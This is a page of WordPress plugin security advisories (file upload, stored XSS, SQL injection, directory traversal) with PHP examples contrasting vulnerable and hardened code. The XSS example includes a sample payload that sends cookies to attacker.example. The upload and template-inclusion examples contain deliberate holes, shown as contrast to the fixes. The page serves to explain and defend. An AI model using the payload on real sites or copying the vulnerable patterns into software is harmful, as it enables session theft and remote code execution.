Advisories

WP Contact-Form Vulnerabilities

WP Contact Form is a very popular WordPress plugin.

MustLive has reported a number of vulnerabilities in it, which you can view on his web page.

According to the plugin author's page, the latest version is 3.1.8. We went ahead and downloaded a copy to have a look. The actual contact form page that your users see is [...]


WP Downloads Manager 0.2 Remote File Upload

WP Downloads Manager is a plugin for WordPress.

WP Downloads Manager is prone to a vulnerability that lets attackers upload and execute arbitrary code. The issue occurs because the plugin fails to sufficiently sanitize user-supplied file extensions before writing uploaded files onto the web server via the 'upload.php' script.

Successfully exploiting this issue will allow attackers to [...]
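The missing extension check the advisory describes, shown as an added example rather than code from WP Downloads Manager: an upload handler that trusts the client-supplied file name next to one that allow-lists the final extension and names the stored file itself. The function names, the allow-list and the upload directory are assumptions.

```php
<?php
// Added example (not WP Downloads Manager code): unrestricted file upload
// versus an allow-listed, server-named upload. Names and paths are hypothetical.

// Vulnerable pattern: the client-chosen file name is used as-is, so a request
// carrying shell.php stores an executable script inside a web-served directory.
function upload_vulnerable(array $file, string $upload_dir): string
{
    $target = $upload_dir . '/' . $file['name'];
    move_uploaded_file($file['tmp_name'], $target); // no extension check at all
    return $target;
}

// Hardened pattern.
const ALLOWED_EXTENSIONS = ['pdf', 'zip', 'png', 'jpg', 'jpeg', 'gif', 'txt'];

// Returns the lower-cased final extension if it is on the allow-list, else null.
function allowed_extension(string $client_name): ?string
{
    // Drop any directory part and any NUL byte sent to truncate the name.
    $base = basename(str_replace("\0", '', $client_name));
    // Only the LAST extension decides: "shell.jpg.php" is rejected as php.
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    return ($ext !== '' && in_array($ext, ALLOWED_EXTENSIONS, true)) ? $ext : null;
}

function upload_hardened(array $file, string $upload_dir): ?string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return null;
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return null;            // not a file PHP received in this request
    }
    $ext = allowed_extension($file['name']);
    if ($ext === null) {
        return null;            // reject rather than try to "fix" the name
    }
    // The server picks the stored name: one random stem, one vetted extension.
    // This also defuses "shell.php.jpg", which passes the extension test but
    // would otherwise keep ".php." in a name Apache may treat as PHP under
    // multi-extension handling.
    $target = rtrim($upload_dir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($file['tmp_name'], $target) ? $target : null;
}
```

The extension check is only half of the fix. Pair it with an upload directory that is served without script execution (for mod_php, `php_flag engine off` in that directory; for nginx, a location block that never passes the path to the FastCGI backend), so that even a file that slips past the check cannot run.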


Nextgen gallery – XSS flaw

NextGEN Gallery plugin versions <= 0.96 have been found vulnerable to a persistent cross-site scripting bug.

According to the advisory, the attacker does require authentication and access to the following URL:

http://[host]/[directory]/wp-admin/admin.php?page=nggallery-manage-gallery

As far as we know, no fix is currently available.
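What a persistent XSS on an admin page of this kind looks like, as an added illustration and not NextGEN Gallery's code: a value saved through the management page is rendered back into the page without output escaping, beside the escaped form. The advisory does not name the affected field, so the gallery title, the sample record and the function names are assumptions.

```php
<?php
// Added example (not NextGEN Gallery code): a stored value rendered into the
// gallery admin page without output escaping, and the escaped form. The field
// name and the page fragment are hypothetical.

// Constructed sample record, as if read back from the database after an
// authenticated user saved it through the manage-gallery page.
$gallery = [
    'id'    => 7,
    'title' => '"><script>document.location="https://attacker.example/?c="+document.cookie</script>',
];

// Vulnerable rendering: the stored string lands inside an attribute value
// verbatim. The leading "> closes the attribute and the tag, and the script
// then runs for every administrator who opens the page, not just the user
// who saved it.
function render_row_vulnerable(array $gallery): string
{
    return '<tr><td><input type="text" name="title" value="' . $gallery['title'] . '"></td>'
         . '<td>' . $gallery['title'] . '</td></tr>';
}

// Hardened rendering: escape at output time, per context. In WordPress the
// helpers are esc_attr() for attribute values and esc_html() for text nodes;
// plain PHP's htmlspecialchars() with ENT_QUOTES covers both contexts here.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_row_hardened(array $gallery): string
{
    return '<tr><td><input type="text" name="title" value="' . esc($gallery['title']) . '"></td>'
         . '<td>' . esc($gallery['title']) . '</td></tr>';
}

echo render_row_vulnerable($gallery), "\n";
echo render_row_hardened($gallery), "\n";
```

Escaping belongs at the output, not only at the input: the same stored value can reach several HTML contexts, and any account allowed to save gallery data can plant a payload that later executes in an administrator's browser, which is why "requires authentication" narrows but does not remove the risk.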


WordPress Upload File Plugin SQL Injection

A SQL injection vulnerability has been reported in the WordPress Upload File plugin by the Balsec Team. The advisory is lacking a lot of detail.

This post will be updated as new information is made available.


WordPress 2.3.3 Directory Traversal Vulnerability

Sandor Attila Gerendi found a vulnerability in WordPress 2.3.3 which, under certain circumstances, allows an attacker to run arbitrary PHP code on the affected site.

Input passed via the “cat” parameter to index.php is not properly sanitised in the “get_category_template()” function in wp-includes/theme.php before being used to include files in template-loader.php. This can be exploited to include [...]
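The pattern at issue and one way to close it, as an added example modelled on the description above rather than WordPress core code: a template chooser that splices the raw `cat` query variable into a path that is later included, next to one that only accepts a positive integer and verifies the resolved file stays inside the template directory. Later WordPress releases take the first of these two measures by wrapping the value in absint(); the containment check, the demo directory and the function names are assumptions.

```php
<?php
// Added example (not WordPress core code): a template path built from an
// unvalidated query variable, and a hardened version. Names are hypothetical.

// Vulnerable: whatever the client sent for ?cat= becomes part of a path that
// the caller goes on to include(). "../" sequences and similar are passed through.
function category_template_vulnerable(string $template_dir, string $cat): ?string
{
    $candidate = $template_dir . '/category-' . $cat . '.php';
    return file_exists($candidate) ? $candidate : null;
}

// Hardened, two independent checks:
//  1. accept only a plain positive integer for the category id;
//  2. resolve the final path and refuse anything outside the template directory.
function category_template_hardened(string $template_dir, string $cat): ?string
{
    $id = (int) $cat;
    if ($id <= 0 || (string) $id !== $cat) {
        return null;            // "../x", "7/../y", "0", "" are all rejected here
    }
    $candidate = $template_dir . '/category-' . $id . '.php';
    $real_dir  = realpath($template_dir);
    $real_file = realpath($candidate);   // false when the file does not exist
    if ($real_dir === false || $real_file === false) {
        return null;
    }
    // Containment: the resolved file must sit under the resolved template dir.
    if (strpos($real_file, $real_dir . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real_file;
}

// Demonstration on a constructed temporary theme directory (run from the CLI).
$theme = sys_get_temp_dir() . '/theme-' . bin2hex(random_bytes(4));
mkdir($theme);
file_put_contents("$theme/category-7.php", "<?php echo 'category 7 template';");

foreach (['7', '../category-7', '7/../../category-7', '007', '8'] as $cat) {
    printf("cat=%-20s -> %s\n", var_export($cat, true),
        var_export(category_template_hardened($theme, $cat), true));
}
```

The integer check alone would have stopped this particular bug; the realpath() containment check is the general defence for any include whose path carries request data, and it also catches mistakes made further up the stack (a filter that rewrites the path, a theme that stores templates behind a symlink).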